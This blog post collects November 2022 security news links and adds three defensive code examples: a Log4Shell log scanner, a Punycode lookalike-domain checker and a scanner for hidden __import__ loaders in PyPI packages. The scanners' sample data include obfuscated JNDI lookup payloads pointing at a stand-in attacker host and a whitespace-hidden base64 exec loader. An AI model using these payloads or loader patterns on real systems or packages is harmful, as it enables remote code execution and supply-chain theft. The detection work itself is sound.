Cyber security news November 2022

This posting is here to collect cyber security news in November 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

349 Comments

  1. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
    The FBI and CISA say an Iranian-backed threat group hacked a US Federal Civilian Executive Branch and deployed XMRig cryptomining malware via the Log4Shell flaw — The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked …

    US govt: Iranian hackers breached federal agency using Log4Shell exploit
    https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/

    The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.

    The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability.

    After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency’s network.

    Reply
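An added detection example for the Log4Shell entry above (editor's code, not part of the advisory or the BleepingComputer article): the JNDI lookup string that exploits CVE-2021-44228 is usually obfuscated with nested `${lower:..}` / `${::-x}` lookups and URL encoding before it reaches a log. The scanner below peels those layers before matching, so it catches the variants a plain `${jndi:` grep misses. The log lines are constructed, and the attacker host 203.0.113.7 is a documentation address, not one from the advisory.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines (not from the advisory). Line 0 is
# benign; lines 1-4 carry Log4Shell probe shapes with an assumed attacker host.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "${${lower:j}${lower:n}di:${lower:ldap}://203.0.113.7/x}"',
    '10.0.0.9 - - "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fy%7D HTTP/1.1" 400 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/z}"',
]

# Lookups attackers nest inside the payload to break naive "${jndi:" matching.
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}")  # ${lower:j}   -> j
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")        # ${::-l}, ${env:X:-l} -> l
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:")           # ${jndi:ldap:... -> "ldap"


def normalize(text: str) -> str:
    """Undo URL encoding and resolve case/default lookups until nothing changes."""
    prev = None
    while prev != text:                 # peel stacked %-encoding layers
        prev = text
        text = unquote(text)
    text = text.lower()
    prev = None
    while prev != text:                 # innermost lookups resolve first ({} excluded)
        prev = text
        text = LOOKUP_CASE.sub(r"\1", text)
        text = LOOKUP_DEFAULT.sub(r"\1", text)
    return text


def scan_line(line: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    match = JNDI.search(normalize(line))
    return match.group(1) if match else None


def scan_logs(lines):
    """Return (index, scheme, raw_line) for every line that contains a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        scheme = scan_line(line)
        if scheme:
            hits.append((index, scheme, line))
    return hits


if __name__ == "__main__":
    for index, scheme, line in scan_logs(SAMPLE_LOGS):
        print(f"line {index}: jndi scheme={scheme}: {line}")
```

The normalisation loop only rewrites lookups whose bodies contain no braces, so nested forms such as `${jndi:${::-l}dap://...}` resolve inside-out. A deployment would run this over Horizon and web tier access logs and alert on any hit, then check the same host for outbound LDAP/RMI connections, since the lookup alone does not prove the callback succeeded.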
  2. Tomi Engdahl says:

    Chinese Hackers Using 42,000 Imposter Domains in Massive Phishing Attack Campaign https://thehackernews.com/2022/11/chinese-hackers-using-42000-imposter.html
    A China-based financially motivated group is leveraging the trust associated with popular international brands to orchestrate a large-scale phishing campaign dating back as far as 2019. More than 400 organizations, including Emirates, Shopee, Unilever, Indomie, Coca-Cola, McDonald’s, and Knorr, are being imitated as part of the criminal scheme, the researchers said. Original at https://www.cyjax.com/2022/11/14/fangxiao-a-chinese-threat-actor/

    Reply
  3. Tomi Engdahl says:

    #StopRansomware: Hive Ransomware
    https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
    The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.

    Reply
  4. Tomi Engdahl says:

    A Comprehensive Look at Emotet’s Fall 2022 Return https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return
    TA542, an actor that distributes Emotet malware, has once again returned from an extensive break from delivering malicious emails. The actor was absent from the landscape for nearly four months, last seen on July 13, 2022 before returning on November 2, 2022. Proofpoint observed multiple changes to Emotet and its payloads including the lures used, and changes to the Emotet modules, loader, and packer.

    Reply
  5. Tomi Engdahl says:

    WASP malware stings Python developers
    https://www.theregister.com/2022/11/16/wasp_python_malware_checkmarx/
    Malware dubbed WASP is using steganography and polymorphism to evade detection, with its malicious Python packages designed to steal credentials, personal information, and cryptocurrency. Original at
    https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192

    Reply
  6. Tomi Engdahl says:

    Disneyland Malware Team: It’s a Puny World After All https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/
    A financial cybercrime group calling itself the Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non-Latin alphabets like Cyrillic.

    Reply
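An added example for the Punycode entry above (editor's code, not from the Krebs article): a small checker that turns an `xn--` A-label back into its Unicode form and flags labels that mix scripts or that collapse onto a protected brand name once Cyrillic lookalikes are mapped to Latin. The brand list, the confusables table and the sample domains are constructed for the example; a production check would use the full Unicode TR39 confusables data rather than the dozen entries here.

```python
import unicodedata

# Brand labels to protect; constructed for this example, not from the article.
BRANDS = {"chase", "wellsfargo", "citibank", "bankofamerica"}

# Hand-picked Cyrillic-to-Latin lookalikes (assumption: a real deployment
# would load the complete Unicode TR39 confusables table).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0455": "s", "\u04cf": "l",
    "\u0458": "j", "\u04bb": "h",
}


def to_unicode(domain: str) -> str:
    """Decode an A-label domain (xn--...) to its U-label form; others pass through."""
    return domain.encode("ascii").decode("idna") if "xn--" in domain else domain


def to_ascii(domain: str) -> str:
    """Encode a U-label domain to the xn-- form seen in DNS and certificate logs."""
    return domain.encode("idna").decode("ascii")


def scripts_of(label: str) -> set:
    """Unicode script names (LATIN, CYRILLIC, GREEK, ...) of the letters in a label."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def skeleton(label: str) -> str:
    """Replace known lookalike characters with the Latin letter they imitate."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)


def analyze(domain: str) -> dict:
    """Report mixed-script labels and labels that imitate a protected brand."""
    uni = to_unicode(domain.lower())
    findings = []
    for label in uni.split("."):
        scripts = scripts_of(label)
        skel = skeleton(label)
        if len(scripts) > 1:
            findings.append(f"mixed scripts {sorted(scripts)} in '{label}'")
        if skel in BRANDS and skel != label:
            findings.append(f"'{label}' is a lookalike of '{skel}'")
    return {"unicode": uni, "ascii": to_ascii(uni),
            "findings": findings, "suspicious": bool(findings)}


# Constructed sample domains: a clean one, a Cyrillic-es lookalike, and a
# brand lookalike presented as the A-label a log or certificate would show.
SAMPLE_DOMAINS = [
    "chase.com",
    "\u0441hase.com",
    to_ascii("wellsf\u0430rgo.com"),
    "citibank-login.example",
]

if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        r = analyze(d)
        print(f"{d:32} -> {r['unicode']:20} suspicious={r['suspicious']} {r['findings']}")
```

The skeleton comparison is what catches a whole-script spoof (every letter Cyrillic, so no script mixing to flag) that still renders identically to a Latin brand; the mixed-script test catches the cheaper one-character swaps. Feed it new domains from certificate transparency or passive DNS and review anything marked suspicious.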
  7. Tomi Engdahl says:

    QBot phishing abuses Windows Control Panel EXE to infect devices https://www.bleepingcomputer.com/news/security/qbot-phishing-abuses-windows-control-panel-exe-to-infect-devices/
    Phishing emails distributing the QBot malware are using a DLL hijacking flaw in the Windows 10 Control Panel to infect computers, likely as an attempt to evade detection by security software.

    Reply
  8. Tomi Engdahl says:

    DEV-0569 finds new ways to deliver Royal ransomware, various payloads https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/
    Recent activity from the threat actor that Microsoft tracks as DEV-0569, known to distribute various payloads, has led to the deployment of the Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors. Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation. Also:
    https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/

    Reply
  9. Tomi Engdahl says:

    Google wins lawsuit against alleged Russian botnet herders https://www.theregister.com/2022/11/17/google_botnet_default_judgment/
    According to the court docs, the Glupteba malware instructs the computers it has infected to look for the addresses of its command-and-control servers by “referencing transactions associated with specific accounts on the… blockchain.” Basically, if the botnet’s C2 servers are disabled, its operators can simply set up new servers and broadcast their addresses on the blockchain.

    Reply
  10. Tomi Engdahl says:

    Cyberattacks On U.S. Airport Websites Signal Growing Threat To Critical Infrastructure https://www.forbes.com/sites/emilsayegh/2022/11/16/snakes-on-a-plane-beware-of-airport-cyber-attacks/
    The October outages for Los Angeles International Airport (LAX), Chicago O’Hare (ORD), and Atlanta Hartsfield-Jackson International appear to be part of ongoing pro-Russian cyberattacks, an escalation of a recent campaign protesting the U.S. government’s support for Ukraine in its war with Russia.

    Reply
  11. Tomi Engdahl says:

    Hundreds Infected With ‘Wasp’ Stealer in Ongoing Supply Chain Attack
    https://www.securityweek.com/hundreds-infected-wasp-stealer-ongoing-supply-chain-attack

    Security researchers are raising alarm on an ongoing supply chain attack that uses malicious Python packages to distribute an information stealer.

    Ongoing since the first half of October, the attack was uncovered by Phylum on November 1, with the attackers copying existing popular libraries and injecting a malicious ‘import’ statement into them.

    The purpose of the injected code is to infect the victim’s machine with a script that runs in the background. The script, which fetches the victim’s geolocation, contains a modified version of an information stealer called Wasp.

    The attackers have managed to infect hundreds of victims to date, while actively releasing new packages to continue the campaign, Checkmarx notes.

    Phylum Discovers Dozens More PyPI Packages Attempting to Deliver W4SP Stealer in Ongoing Supply-Chain Attack
    https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack

    Last week, our automated risk detection platform alerted us to suspicious activity in dozens of newly published PyPI packages. Here’s what we uncovered.

    Last week, our automated risk detection platform alerted us to some suspicious activity in dozens of newly published PyPI packages. It appears that these packages are a more sophisticated attempt to deliver the W4SP Stealer on to Python developer’s machines by hiding a malicious __import__ . Join us here on the Phylum research team as we investigate these new and shifting tactics the attacker is using to deploy W4SP stealer in this supply-chain attack.

    Reply
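An added example for the two WASP/W4SP items above (editor's code, not from the SecurityWeek, Checkmarx or Phylum write-ups): a static scanner for a Python package file that looks for the hidden `__import__` trick those posts describe. It walks the AST for `__import__` calls, `exec`/`eval`/`compile`, and decoder calls, and separately flags a line where code is pushed out of view behind a long run of whitespace. The sample source is constructed; that the attackers padded the line with spaces is an assumption used only to build the sample, and the payload it carries is a harmless `print`.

```python
import ast
import base64
import re

# Constructed sample: a "copied popular library" file with one appended
# statement hidden behind ~300 spaces (assumed layout, built for this example).
HIDDEN_PAYLOAD = base64.b64encode(b'print("stealer would run here")').decode()
SAMPLE_SOURCE = (
    "import os\n"
    "\n"
    "def helper(x):\n"
    "    return x * 2\n"
    "\n"
    "VERSION = '1.0.3';" + " " * 300
    + "__import__('builtins').exec(__import__('builtins').compile("
    + f"__import__('base64').b64decode('{HIDDEN_PAYLOAD}'), '<string>', 'exec'))\n"
)

SUSPICIOUS_CALLS = {"exec", "eval", "compile"}
DECODERS = {"b64decode", "b32decode", "a85decode", "unhexlify"}
WHITESPACE_GAP = re.compile(r"\S[ \t]{40,}\S")   # code separated by a wide blank gap


def _call_name(node: ast.Call):
    """Name of the thing being called: foo(...) -> 'foo', x.bar(...) -> 'bar'."""
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return None


def scan_source(source: str, filename: str = "<package>") -> list:
    """Return findings as dicts with line, kind and detail, sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if isinstance(node.func, ast.Name) and name == "__import__":
            arg = node.args[0] if node.args else None
            module = arg.value if isinstance(arg, ast.Constant) else "<dynamic>"
            findings.append({"line": node.lineno, "kind": "dunder_import", "detail": str(module)})
        elif name in SUSPICIOUS_CALLS:
            findings.append({"line": node.lineno, "kind": "code_execution", "detail": name})
        elif name in DECODERS:
            findings.append({"line": node.lineno, "kind": "decoder", "detail": name})
    for lineno, line in enumerate(source.splitlines(), start=1):
        if WHITESPACE_GAP.search(line):
            findings.append({"line": lineno, "kind": "hidden_by_whitespace",
                             "detail": f"{len(line)} chars wide"})
    return sorted(findings, key=lambda f: (f["line"], f["kind"]))


def verdict(findings: list) -> str:
    """'malicious' when a dynamic import is combined with code execution."""
    kinds = {f["kind"] for f in findings}
    if {"dunder_import", "code_execution"} <= kinds:
        return "malicious"
    return "review" if findings else "clean"


if __name__ == "__main__":
    results = scan_source(SAMPLE_SOURCE, "setup_helper.py")
    for f in results:
        print(f"line {f['line']}: {f['kind']} ({f['detail']})")
    print("verdict:", verdict(results))
```

Run this over every `.py` file in a freshly downloaded sdist or wheel before installing it; the AST pass is what matters, since the whitespace heuristic only recovers the specific presentation trick and a `__import__` chain is equally suspicious on a short line.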
  12. Tomi Engdahl says:

    Experts dismiss the “income king’s” latest explanations: “Professionals don’t pull pranks” https://www.is.fi/digitoday/tietoturva/art-2000009208880.html

    Reply
  13. Tomi Engdahl says:

    Ticketmaster Cancels Public Sale For Taylor Swift ‘Eras’ Tour Amid Historically High Demand
    https://www.forbes.com/sites/marisadellatto/2022/11/17/ticketmaster-cancels-public-sale-for-taylor-swift-eras-tour-amid-historically-high-demand/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Gordie&sh=1722e3c66cf1

    Ticketmaster said Thursday it was canceling the general admissions sale of tickets for Taylor Swift’s “The Eras” tour, after the site crashed earlier this week during pre-sale events because of “historically unprecedented” demand.

    Reply
  14. Tomi Engdahl says:

    Suspicion: data breach at Uponor before the extortion https://www.is.fi/digitoday/tietoturva/art-2000009210377.html

    Uponor, which was hit by a ransomware attack two weeks ago, says it has found signs of a data breach in its systems.

    Reply
  15. Tomi Engdahl says:

    Microsoft urges devs to migrate away from .NET Core 3.1 ASAP
    https://www.bleepingcomputer.com/news/security/microsoft-urges-devs-to-migrate-away-from-net-core-31-asap/

    Microsoft has urged developers still using the long-term support (LTS) release of .NET Core 3.1 to migrate to the latest .NET Core versions until it reaches the end of support (EOS) next month.

    The company warned customers on the Windows message center to upgrade to .NET 6 (LTS) or .NET 7 “as soon as possible” before .NET Core 3.1 (LTS) reaches EOS on December 13, 2022.

    Reply
  16. Tomi Engdahl says:

    Will #infosecTwitter survive Elon Musk?
    https://www.cyberscoop.com/twitter-dumpster-fire-infosectwitter/

    For years infosec Twitter has been a robust community, with all the ups and downs, quality and dreck, you’d find in any online space. Many have moved over to Mastodon, which offers a Twitter-like experience with notable differences by design.

    “That’s where infosec is now,” Patrick Gray, the host of the Risky Business podcast, said on his show Wednesday. “It’s absolutely insane how quickly it happened.”

    But some worry that the fracturing of infosec Twitter could have profound impacts on not only the community, but the vital exchange about the latest vulnerabilities, researchers’ techniques and tactics and the newest hacks that have collectively helped make the internet more secure — and the people on the frontlines of cybersecurity more informed.

    The platform became a replacement for the often private and exclusive channels that security researchers previously relied on to share information.

    Reply
  17. Tomi Engdahl says:

    Twitter’s Broken Its Copyright Strike System, Users Are Uploading Full Movies
    https://www.forbes.com/sites/paultassi/2022/11/20/twitters-broken-its-copyright-strike-system-users-are-uploading-full-movies/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Valerie&sh=cd7a4f97d3a8

    While Twitter, the website, remains online and has not simply collapsed after the vast majority of workers were fired or resigned under Elon Musk, we are already starting to see the cracks spreading through the walls.

    Last night, it became apparent that Twitter’s automated copyright strike/takedown system was no longer functional. A user went viral for uploading the entirety of The Fast and the Furious Tokyo Drift in two minute chunks over a 50 tweet thread. While it’s offline this morning, here’s where things get weirder still:

    The media itself was never taken down. Usually, you used to see a “this media cannot be displayed” message when a takedown happens. The tweet and account will be up, but the media is stripped. In this case, it appears someone at Twitter had to manually suspend the entire account.

    And as evidence of a further bug, right now, on mobile, I can still see the tweets from the suspended account. As in, the movie is literally playing in a tweet I am watching on my phone right now, some lingering artifact of account suspension. I can’t see it on desktop, but the tweets I favorited last night to write this article this morning are still actively viewable.

    And again, fundamentally the copyright system does seem broken. Yes, this specific account was suspended, but only because it went viral and was spotted by someone working there, I think. A separate user has uploaded another full movie, 1995’s Hackers, two minutes at a time in a similar thread, and that remains online at the time of this writing.

    It should be fairly obvious to anyone what kind of liability it opens Twitter up to if their copyright system is non-functional, and its newly limited pool of workers are going to need to manually hunt down infringers. Once media companies get wind of this, we could see Twitter hit with all sort of DMCA claims and potential legal issues if they can’t get a handle on this quickly. I’m picturing Disney content starting to be uploaded here and them going nuclear.

    Also, it should be noted that one of Elon Musk’s big ideas for Twitter Blue is to allow users to upload long, 40+ minute videos. That would be a nightmare if they can’t fix their copyright enforcement system.

    Reply
  18. Tomi Engdahl says:

    Hackers show porn on Brisbane billboard for three minutes
    https://www.smh.com.au/national/queensland/hackers-show-porn-on-brisbane-billboard-for-three-minutes-20221121-p5bzyc.html?utm_medium=Social&utm_source=Facebook#Echobox=1668997468

    Pornography has been shown for up to three minutes after hackers cracked a large electronic roadside billboard along one of Brisbane’s busiest roads.

    The billboard company provided police with images of people who “may be able to help with their inquiries” after the cyberattack on Sunday.

    Reply
  19. Tomi Engdahl says:

    Earth Preta Spear-Phishing Governments Worldwide https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
    We have been monitoring a wave of spear-phishing attacks targeting the government, academic, foundations, and research sectors around the world. Based on the lure documents we observed in the wild, this is a large-scale cyberespionage campaign that began around March. After months of tracking, the seemingly wide outbreak of targeted attacks includes but is not limited to Myanmar, Australia, the Philippines, Japan and Taiwan. We analyzed the malware families used in this campaign and attributed the incidents to a notorious advanced persistent threat (APT) group called Earth Preta (also known as Mustang Panda and Bronze President).

    Reply
  20. Tomi Engdahl says:

    Previously unidentified ARCrypter ransomware expands worldwide https://www.bleepingcomputer.com/news/security/previously-unidentified-arcrypter-ransomware-expands-worldwide/
    A previously unknown ARCrypter ransomware that compromised key organizations in Latin America is now expanding its attacks worldwide.
    Threat actors behind the new ransomware family attacked a government agency in Chile last August, targeting both Linux and Windows systems and appending the .crypt extension on encrypted files.

    Reply
  21. Tomi Engdahl says:

    Microsoft fixes Windows Kerberos auth issues in emergency updates https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-kerberos-auth-issues-in-emergency-updates/
    Microsoft has released optional out-of-band (OOB) updates to fix a known issue triggering Kerberos sign-in failures and other authentication problems on enterprise Windows domain controllers after installing cumulative updates released during November’s Patch Tuesday.

    Reply
  22. Tomi Engdahl says:

    Researchers Quietly Cracked Zeppelin Ransomware Keys https://krebsonsecurity.com/2022/11/researchers-quietly-cracked-zeppelin-ransomware-keys/
    Peter, who spoke candidly about the attack on condition of anonymity, said the FBI told him to contact a cybersecurity consulting firm in New Jersey called Unit 221B, and specifically its founder Lance James. Zeppelin sprang onto the crimeware scene in December 2019, but it wasn’t long before James discovered multiple vulnerabilities in the malware’s encryption routines that allowed him to brute-force the decryption keys in a matter of hours, using nearly 100 cloud computer servers.

    Reply
  23. Tomi Engdahl says:

    Signs of a data breach in the wake of the ransomware attack on Uponor; the company has made progress in restoring its operations https://www.uponorgroup.com/fi-fi/sijoittajauutiset/2022/merkkeja-tietomurrosta-uponoriin-kohdistuneen-kiristysohjelmahyokkayksen-jaljilta-yhtio-on-edistynyt-toimintojensa-palauttamisessa-ennalleen
    In its investigations Uponor has found signs of a data breach affecting the data of Uponor’s employees, customers and other partners.
    According to Uponor’s current information, the data affected by the breach has not been made public.

    Reply
  24. Tomi Engdahl says:

    Chinese hackers use Google Drive to drop malware on govt networks https://www.bleepingcomputer.com/news/security/chinese-hackers-use-google-drive-to-drop-malware-on-govt-networks/
    The attacks have been observed between March and October 2022 and researchers attributed it to the cyber espionage group Mustang Panda (Bronze President, TA416).

    Reply
  25. Tomi Engdahl says:

    Exploit released for actively abused ProxyNotShell Exchange bug https://www.bleepingcomputer.com/news/security/exploit-released-for-actively-abused-proxynotshell-exchange-bug/
    Proof-of-concept exploit code has been released online for two actively exploited and high-severity vulnerabilities in Microsoft Exchange, collectively known as ProxyNotShell.

    Reply
  26. Tomi Engdahl says:

    Transportation sector targeted by both ransomware and APTs https://www.helpnetsecurity.com/2022/11/18/cybersecurity-trends-q3-2022/
    US ransomware activity leads the pack: In the US alone, ransomware activity increased 100% quarter over quarter in transportation and shipping. Globally, transportation was the second most active sector (following telecom). APTs were also detected in transportation more than in any other sector.

    Reply
  27. Tomi Engdahl says:

    An AI Based Solution to Detecting the DoubleZero .NET Wiper https://unit42.paloaltonetworks.com/doublezero-net-wiper/
    Unit 42 researchers introduce a machine learning model that predicts the maliciousness of .NET samples based on specific structures in the file, by analyzing a .NET wiper named DoubleZero. We identify the challenges of detecting this threat through PE structural analysis and conclude by examining the cues picked up by the machine learning model to detect this sample.

    Reply
  28. Tomi Engdahl says:

    Email Cyberattacks on Arab Countries Rise in Lead to Global Football Tournament https://www.trellix.com/en-us/about/newsroom/stories/research/email-cyberattacks-on-arab-countries-rise.html
    Global eyes are soon to be turned to the first global football tournament to be held in the Arab world, kicking off on November 20, but malicious actors have already kicked off their World Cup-themed cyberattacks. Email security researchers from the Trellix Advanced Research Center have found attackers to be leveraging FIFA and football-based campaigns to target organizations in Arab countries. It is a common practice for attackers to utilize important/popular events as a part of their social engineering tactics and particularly to target the organizations which are related to the event and are more promising victims for the attack. Trellix Advanced Research Center researchers caught various emails utilizing the football tournament as an initial attack vector. The following are cases of samples found in the wild:

    Reply
  29. Tomi Engdahl says:

    Google Search results poisoned with torrent sites via Data Studio https://www.bleepingcomputer.com/news/security/google-search-results-poisoned-with-torrent-sites-via-data-studio/
    Introduced in 2016 by Google, Looker Studio (formerly Google Data Studio) is a web-based business intelligence tool that enables users to transform data into customizable informative reports and dashboards for easy visualization and analysis.

    Reply
  30. Tomi Engdahl says:

    iOS 16.2: Why You Should Apply The Next iPhone Software Straight Away https://www.forbes.com/sites/kateoflahertyuk/2022/11/19/ios-162-why-you-should-apply-the-next-iphone-software-straight-away/
    But interestingly, Apple iOS 16.2 could see a new feature called Rapid Security Response in action, which is a way for Apple to apply security updates to your phone on the fly. It was first announced with iOS 16 at Apple’s Fall event, but not made immediately available. This could be about to change, as the iPhone maker has just tested Rapid Security Response in the iOS 16.2 beta.

    Reply
  31. Tomi Engdahl says:

    Omron PLC Vulnerability Exploited by Sophisticated ICS Malware
    https://www.securityweek.com/omron-plc-vulnerability-exploited-sophisticated-ics-malware

    A critical vulnerability has not received the attention it deserves

    A critical vulnerability affecting Omron products has been exploited by a sophisticated piece of malware designed to target industrial control systems (ICS), but it has not received the attention it deserves.

    On November 10, the US Cybersecurity and Infrastructure Security Agency (CISA) published two advisories describing three vulnerabilities affecting NJ and NX-series controllers and software made by Japanese electronics giant Omron.

    One of the advisories describes CVE-2022-33971, a high-severity flaw that can allow an attacker who can access the targeted Omron programmable logic controller (PLC) to cause a denial-of-service (DoS) condition or execute malicious programs.

    The second advisory describes CVE-2022-34151, a critical hardcoded credentials vulnerability that can be used to access Omron PLCs, and CVE-2022-33208, a high-severity issue that can be used to obtain sensitive information that could allow hackers to bypass authentication and access the controller.

    ICS Advisory (ICSA-22-314-07)
    Omron NJ/NX-series Machine Automation Controllers
    https://www.cisa.gov/uscert/ics/advisories/icsa-22-314-07

    ICS Advisory (ICSA-22-314-08)
    Omron NJ/NX-series Machine Automation Controllers
    https://www.cisa.gov/uscert/ics/advisories/icsa-22-314-08

    Reply
  32. Tomi Engdahl says:

    https://www.securityweek.com/ukrainian-hacker-sought-us-arrested-switzerland-report

    A Ukrainian hacker sought by US authorities for a decade was arrested last month in Switzerland, the specialist website Krebs on Security reported.

    Reply
  33. Tomi Engdahl says:

    Microsoft Warns of Cybercrime Group Delivering Royal Ransomware, Other Malware
    https://www.securityweek.com/microsoft-warns-cybercrime-group-delivering-royal-ransomware-other-malware

    A threat actor tracked as DEV-0569 and known for the distribution of various malicious payloads was recently observed updating its delivery methods, Microsoft warns.

    DEV-0569 has been relying on malicious ads (malvertising), blog comments, fake forum pages, and phishing links for the distribution of malware.

    Over the past few months, however, Microsoft noticed that the threat actor has started using contact forms to deliver phishing links, while choosing to host fake installers on legitimate-looking software download sites and legitimate repositories, such as GitHub and OneDrive.

    The adversary continues to rely on malvertising for malware distribution, and even expanded the technique by employing Google Ads in one of the campaigns.

    “These methods allow the group to potentially reach more targets and ultimately achieve their goal of deploying various post-compromise payloads,” Microsoft says.

    The group is also known for signing malicious binaries with legitimate certificates, and for using encrypted malware payloads and defense evasion techniques. In recent attacks, DEV-0569 has used the open-source tool Nsudo for disabling antivirus solutions.

    DEV-0569 finds new ways to deliver Royal ransomware, various payloads
    https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

    Reply
  34. Tomi Engdahl says:

    Hive Ransomware Gang Hits 1,300 Businesses, Makes $100 Million
    https://www.securityweek.com/hive-ransomware-gang-hits-1300-businesses-makes-100-million

    The Hive ransomware gang has victimized more than 1,300 businesses, receiving over $100 million in ransom payments over the past year and a half, US government agencies say.

    Active since June 2021 and offered as ransomware-as-a-service (RaaS), Hive has been used in attacks against businesses and critical infrastructure entities, including communications, government, healthcare, IT, and critical manufacturing organizations.

    In an effort to increase awareness of Hive ransomware, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have released a joint alert detailing observed indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs).

    Reply
  35. Tomi Engdahl says:

    Samba Patches Vulnerability That Can Lead to DoS, Remote Code Execution
    https://www.securityweek.com/samba-patches-vulnerability-can-lead-dos-remote-code-execution

    Samba this week released patches for an integer overflow vulnerability that could potentially lead to arbitrary code execution.

    An open source Server Message Block (SMB) implementation for Linux and Unix systems, Samba can be used as an Active Directory Domain Controller (AD DC).

    Tracked as CVE-2022-42898 and impacting multiple Samba releases, the newly addressed security defect exists in the Service for User to Proxy (S4U2proxy) handler, which provides “a service that obtains a service ticket to another service on behalf of a user.”

    Also referred to as ‘constrained delegation’, the feature relies on request and response messages from the Kerberos ticket-granting service (TGS) exchange. Heimdal and MIT Kerberos libraries in Samba ensure Kerberos support and implement the Key Distribution Center (KDC).

    The affected libraries provide an authentication mechanism by means of tickets that can contain Privilege Attribute Certificates (PACs). The bug can be triggered by sending a specially crafted request to the KDC server.

    https://www.samba.org/samba/history/security.html
    https://mailman.mit.edu/pipermail/kerberos-announce/2022q4/000202.html

    Reply
  36. Tomi Engdahl says:

    This Week In Security: Mastodon, Fake Software Company, And ShuffleCake
    https://hackaday.com/2022/11/18/this-week-in-security-mastadon-fake-software-company-and-shufflecake/

    Due to Twitter’s new policy of testing new features on production, the interest in Mastodon as a potential replacement has skyrocketed. And what’s not to love? You can host it yourself, it’s part of the Fediverse, and you can even run one of the experimental forks for more features. But there’s also the danger of putting a service on the internet, as [Gareth Heyes] illustrates by stealing passwords from, ironically, the infosec.exchange instance.

    Stealing passwords from infosec Mastodon – without bypassing CSP
    https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp

    Everybody on our Twitter feed seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about. After figuring out why exactly you had to have loads of @ symbols in your username, I began to have a look at how secure it was. If you’ve followed me on Twitter you’ll know I like to post vectors and test the limits of the app I’m using, and today was no exception.

    First, I began testing to see if HTML or Markdown was supported. I did a couple of “tweets” to see if you could have code blocks (how cool would that be?) but nothing seemed to work. That is, until @ret2bed pointed out that you could change your preferences to enable HTML! That’s right people, a social network that enables you to post HTML – what could possibly go wrong?

    Reply
  37. Tomi Engdahl says:

    Making Cobalt Strike harder for threat actors to abuse https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse
    We are releasing to the community a set of open-source YARA Rules and their integration as a VirusTotal Collection to help the community flag and identify Cobalt Strike’s components and their respective versions. Since many threat actors rely on cracked versions of Cobalt Strike to advance their cyberattacks, we hope that by disrupting its use we can help protect organizations, their employees, and their customers around the globe.

    Reply
  38. Tomi Engdahl says:

    Russian 0day thirst traps
    https://grugq.substack.com/p/russian-0day-thirst-traps
    A Russian 0day company has raised their prices for Signal exploits to well above competitor Zerodium. What might this indicate? … Here is the assessment: Russia is desperate for Android and Signal exploits.
